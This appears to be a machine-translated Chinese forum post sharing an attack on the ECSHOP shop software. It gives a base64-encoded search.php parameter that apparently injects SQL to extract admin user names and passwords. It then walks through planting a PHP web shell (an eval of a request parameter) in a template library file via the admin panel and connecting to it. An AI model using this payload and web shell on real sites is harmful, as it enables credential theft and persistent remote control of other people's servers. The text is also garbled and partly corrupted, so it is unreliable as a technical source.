这个 是 search.php exp variants search.php? encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxmju6ijenksbhbmqgmt0yiedst1vqiejzigdvb2rzx2lkihvuaw9uigfsbcbzzwxly3qgy29uy2f0khvzzxjfbmftzswwednhlhbhc3n3b3jklccixccpihvuaw9uihnlbgvjdcaxiyinkswxigzyb20gzwnzx2fkbwlux3vzzxijijtzoje6ijeio319
Take SHELL landing in the background/admin/ enter the user password for the module management-library management-select myship. lbi insert<? php eval($_REQUEST['cmd'])?& gt;
I injected into a background, and then follow the step to try it, if successful. The following steps of:
Point determine after accesshttp://www.. net/myship.php*, see this page what's changed, and then I used the lake2 of dual-use sentence sure enough the connection is successful. As shown in Figure:
This method principle is said to ECSHOP the smarty template mechanism is to allow the direct execution of php code, resulting in exploits generated. My smarty's nothing to understand, but will try.
This method is really good, once again gotten the cattle of the technology. Just found online nothing to improve this method, so I saw it and share.